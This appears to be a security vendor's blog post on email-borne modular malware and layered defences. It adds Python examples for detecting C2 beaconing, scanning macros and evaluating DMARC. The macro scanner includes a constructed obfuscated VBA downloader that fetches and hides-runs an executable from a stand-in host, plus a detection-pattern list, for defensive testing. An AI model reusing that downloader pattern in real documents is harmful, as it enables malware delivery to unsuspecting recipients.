Defend your business against evolving and sophisticated modular malware attacks.
Barracuda researchers have seen a spike in the use of modular malware since the beginning of 2019. A recent analysis of email attacks targeting Barracuda customers identified more than 150,000 unique malicious files in the first five months of the year.
Here’s a closer look at modular malware and solutions to help detect and block attacks.
Threat Spotlight
Modular Malware — Cybercriminals use email to deliver modular malicious software, also known as modular malware. An ever-increasing trend, modular malware provides an architecture that is more robust, evasive and dangerous than typical document-based or web-based malware. Modular malware includes—and can selectively launch—different payloads and functionality, depending on the target and the goal of the attack.
Most malware is distributed as a document attachment that is sent via spam to widely-circulated email lists. These email lists are sold, traded, aggregated, and revised as they move through the dark web.
Once an infected document is opened, either the malware is automatically installed or a heavily obfuscated macro/script is used to download and install it from an external source. Occasionally, a link or other clickable item is used, but that approach is much more common in phishing attacks than malware attacks.
With the rise of botnets executing commands provided by cybercriminals and malware written for widespread distribution, modularity has become the new norm. Malware authors are increasingly organized and continue to adopt and implement software-industry practices, including quality assurance and testing, to improve the success of attacks. In response to the demand to meet multiple needs with one widely-distributed malware file, modular malware has evolved to become more feature-rich and flexible.
Typically, modular malware involves a very basic initial payload. Once a foothold has been established on the system, the payload connects to a remote C2 (command and control) server for additional payloads. Information about the system is sent to and processed by the C2 server, and additional payloads are chosen server-side based on that information, or withheld entirely if an analysis environment is detected. This approach has been used in banking trojans, including Emotet, TrickBot, and CoreBot, as well as in infostealers, including LokiBot and Pony.
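The staging behaviour described above leaves a network footprint a defender can look for: a small, regularly repeated check-in from a host to one destination (the profile upload and "is there a module for me?" poll), followed by a response that carries an executable. The following is an added example, not code from Barracuda or from the post; it triages constructed proxy log lines (the log format, thresholds and the fictional hosts are assumptions) by grouping requests per source/destination pair, measuring how regular the check-in interval is, and flagging pairs where a PE header (`MZ`) came back.

```python
"""Triage of constructed proxy log lines for C2-style staging (added example)."""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample, not real telemetry. Fields (assumed log format):
# timestamp  src_ip  destination  method  bytes_out  bytes_in  first_bytes_of_response
SAMPLE_LOG = """\
2019-05-01T10:00:00 10.0.0.5 cdn.example.net GET 300 15000 GIF8
2019-05-01T10:00:12 10.0.0.5 198.51.100.7 POST 1800 200 -
2019-05-01T10:05:11 10.0.0.5 198.51.100.7 POST 1750 200 -
2019-05-01T10:10:13 10.0.0.5 198.51.100.7 POST 1790 200 -
2019-05-01T10:15:12 10.0.0.5 198.51.100.7 POST 1810 320000 MZ
2019-05-01T10:02:00 10.0.0.6 mail.example.com GET 400 9000 <!DO
2019-05-01T10:31:00 10.0.0.6 mail.example.com GET 380 9100 <!DO
"""


def parse(log_text):
    """Split the constructed log into dicts; timestamps become datetime objects."""
    rows = []
    for line in log_text.strip().splitlines():
        ts, src, host, method, out_b, in_b, magic = line.split()
        rows.append({"ts": datetime.fromisoformat(ts), "src": src, "host": host,
                     "method": method, "out": int(out_b), "in": int(in_b), "magic": magic})
    return rows


def triage(log_text, min_requests=3, max_cv=0.2):
    """Return one finding per (src, destination) pair that beacons regularly
    and/or received an executable (response starting with the PE 'MZ' magic).

    A pair is 'beaconing' when it has at least min_requests requests and the
    coefficient of variation of the gaps between them is at most max_cv.
    """
    by_pair = defaultdict(list)
    for r in parse(log_text):
        by_pair[(r["src"], r["host"])].append(r)

    findings = []
    for (src, host), rows in by_pair.items():
        rows.sort(key=lambda r: r["ts"])          # log lines may arrive out of order
        pe_download = any(r["magic"] == "MZ" for r in rows)
        posts = sum(1 for r in rows if r["method"] == "POST")
        beacon, mean_gap = False, None
        if len(rows) >= min_requests:
            gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(rows, rows[1:])]
            mean_gap = statistics.mean(gaps)
            cv = statistics.pstdev(gaps) / mean_gap if mean_gap else float("inf")
            beacon = cv <= max_cv
        if beacon or pe_download:
            findings.append({"src": src, "host": host, "beacon": beacon,
                             "mean_gap_s": mean_gap, "posts": posts,
                             "pe_download": pe_download})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f)
```

Two normal hosts in the sample (a CDN fetch and two mail checks half an hour apart) produce no finding; the 10.0.0.5 to 198.51.100.7 pair is reported as a beacon with a 300-second mean gap, four POST uploads and a PE download. In practice the interval threshold and the "MZ" check are starting points: staged modules are often delivered encrypted, so the beacon regularity and the small-upload/large-download shape are the more durable signals.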
Detecting and Blocking Modular Malware
The rapidly evolving threat environment requires a multi-layered protection strategy—one that closes the technical and human gaps—for every organization to maximize its email security performance and minimize the risk of falling victim to sophisticated attacks like modular malware.
Advanced inbound and outbound security techniques should be deployed, including malware detection, spam filters, firewalls, and sandboxing.
For emails that carry malicious documents as attachments, both static and dynamic analysis can detect indicators that the document is attempting to download and execute an executable, which no document should ever do. The URL for the executable can often be located with heuristics or threat-intelligence systems. Obfuscation found by static analysis can also be a sign that a document is suspicious.
While many malicious emails appear convincing, spam filters and related security software can pick up subtle clues and help block potentially threatening messages and attachments from reaching email inboxes. If a user opens a malicious attachment or clicks a link to a drive-by download, an advanced network firewall capable of malware analysis provides a chance to stop the attack by flagging the executable as it tries to pass through.
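As an added illustration of the static-analysis indicators just described (this is example code, not Barracuda's or the post's own tooling), the script below scans a constructed, non-functional VBA-style macro text: it undoes the common `Chr()`-and-concatenation obfuscation, extracts any URL that becomes visible, and flags the download, file-write and process-execution calls that no document should contain. The macro text, the indicator list and the verdict thresholds are all assumptions for the example.

```python
"""Static macro triage: deobfuscate Chr()/& strings, extract URLs, flag indicators (added example)."""
import re

# Constructed sample resembling an obfuscated downloader macro. It points at the
# reserved .invalid TLD and is not runnable as VBA; it exists only to exercise the checks.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim u As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & ":" & "//" & "example" & ".invalid/" & "upd.exe"
    Dim x As Object
    Set x = CreateObject("MSXML2.XMLHTTP")
    x.Open "GET", u, False
    x.Send
    Set s = CreateObject("ADODB.Stream")
    s.SaveToFile Environ("TEMP") & "\upd.exe", 2
    Shell Environ("TEMP") & "\upd.exe", vbHide
End Sub
'''

# Indicator name -> pattern. Assumed list; a production scanner carries many more.
INDICATORS = {
    "auto-exec": r"\b(AutoOpen|Document_Open|Workbook_Open|AutoExec)\b",
    "http-download": r"XMLHTTP|WinHttpRequest|URLDownloadToFile",
    "file-write": r"ADODB\.Stream|SaveToFile",
    "process-exec": r"\bShell\b|WScript\.Shell",
    "env-path": r"\bEnviron\(",
}
URL_RE = re.compile(r"https?://[A-Za-z0-9./_\-?=&%:]+")
CHR_RE = re.compile(r"Chr\((\d+)\)")
CONCAT_RE = re.compile(r'"([^"]*)"\s*&\s*"([^"]*)"')


def deobfuscate(text):
    """Turn Chr(n) into string literals, then fold adjacent "a" & "b" literals into "ab".
    Returns the rewritten text and the number of Chr() calls seen (an obfuscation signal).
    Note: a Chr(34) (double quote) is not re-escaped; that edge case is left out here."""
    text, chr_calls = CHR_RE.subn(lambda m: '"' + chr(int(m.group(1))) + '"', text)
    while True:
        text, n = CONCAT_RE.subn(lambda m: '"' + m.group(1) + m.group(2) + '"', text)
        if n == 0:
            return text, chr_calls


def analyze_macro(text):
    """Return indicators, URLs, obfuscation count and a coarse verdict for one macro."""
    clean, chr_calls = deobfuscate(text)
    hits = [name for name, pat in INDICATORS.items() if re.search(pat, clean)]
    urls = URL_RE.findall(clean)
    downloads = "http-download" in hits or bool(urls)
    if downloads and "process-exec" in hits:
        verdict = "suspicious"          # document fetching and running an executable
    elif hits or chr_calls:
        verdict = "review"
    else:
        verdict = "clean"
    return {"indicators": hits, "urls": urls, "chr_calls": chr_calls, "verdict": verdict}


if __name__ == "__main__":
    print(analyze_macro(SAMPLE_MACRO))
```

Run on the sample, the deobfuscation step turns the four `Chr()` calls and the chained `&` literals back into `http://example.invalid/upd.exe`, and the combination of an auto-execute entry point, an HTTP object, a file write and `Shell` yields the "suspicious" verdict. The URL recovered this way is exactly what the post says threat-intelligence systems can then look up or block.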
In addition, encryption and DLP (data loss prevention) help secure against accidental and malicious data loss. Email archiving is also critical for compliance and business-continuity purposes.
Backup helps recover from data deletion, and continuity ensures that critical emails can get sent during a potential outage.
Stop attacks that can bypass the email gateway. Artificial intelligence should be used for spear-phishing protection, and DMARC validation detects and prevents email and domain spoofing.
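To make the DMARC point concrete, here is an added example (not Barracuda's code) of the validation logic a receiving gateway applies: parse the sender domain's published DMARC record, check whether the SPF and DKIM results align with the visible From domain under the record's strict or relaxed alignment modes, and apply the published policy when neither aligns. The records and message results are constructed, and the organizational-domain helper is a deliberate simplification (it takes the last two labels rather than consulting the Public Suffix List).

```python
"""DMARC record parsing and alignment evaluation for constructed messages (added example)."""

# Constructed DMARC TXT records as they would be published at _dmarc.<domain>.
RECORD_REJECT = "v=DMARC1; p=reject; adkim=r; aspf=r; rua=mailto:dmarc-reports@example.com"
RECORD_STRICT = "v=DMARC1; p=quarantine; adkim=s; aspf=s"


def parse_dmarc(record):
    """Parse 'tag=value; tag=value' into a dict and apply the DMARC defaults."""
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC1 record")
    return {
        "p": tags.get("p", "none").lower(),
        "adkim": tags.get("adkim", "r").lower(),   # relaxed unless stated
        "aspf": tags.get("aspf", "r").lower(),
        "rua": tags.get("rua"),
    }


def org_domain(domain):
    """Simplified organizational domain: last two labels. Assumption for this example;
    real validators use the Public Suffix List (e.g. for co.uk-style suffixes)."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(from_domain, auth_domain, mode):
    """Strict ('s') alignment requires an exact match; relaxed ('r') matches on org domain."""
    if mode == "s":
        return from_domain.lower() == auth_domain.lower()
    return org_domain(from_domain) == org_domain(auth_domain)


def evaluate(record, from_domain, spf_result, spf_domain, dkim_result, dkim_domain):
    """Return 'pass' if an aligned SPF or DKIM pass exists, else the published policy
    ('none', 'quarantine' or 'reject'). spf_domain is the MAIL FROM domain,
    dkim_domain the d= value of the verified signature (None if no signature)."""
    policy = parse_dmarc(record)
    spf_ok = spf_result == "pass" and aligned(from_domain, spf_domain, policy["aspf"])
    dkim_ok = (dkim_result == "pass" and dkim_domain is not None
               and aligned(from_domain, dkim_domain, policy["adkim"]))
    if spf_ok or dkim_ok:
        return "pass"
    return policy["p"]


if __name__ == "__main__":
    # A spoofed From: SPF passes only for the attacker's own bounce domain, no DKIM.
    print(evaluate(RECORD_REJECT, "example.com", "pass", "bulk-sender.invalid", "none", None))
    # Legitimate mail signed by a subdomain; relaxed alignment accepts it.
    print(evaluate(RECORD_REJECT, "example.com", "fail", "other.invalid", "pass", "mail.example.com"))
```

The first call shows why a passing SPF result is not enough on its own: the result belongs to a domain that does not align with the From header, so the record's `p=reject` applies. The second shows relaxed DKIM alignment accepting a signature from `mail.example.com` for a `example.com` From address; with `adkim=s` the same message would fall through to the published policy.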
This top layer of email defense is the most critical one for every business. Make phishing simulation and training part of security-awareness training. Ensure end users are aware of new types of attacks, show them how to identify potential threats, and transform them from a security liability into a line of defense by testing the effectiveness of in-the-moment training and identifying the users most vulnerable to attacks.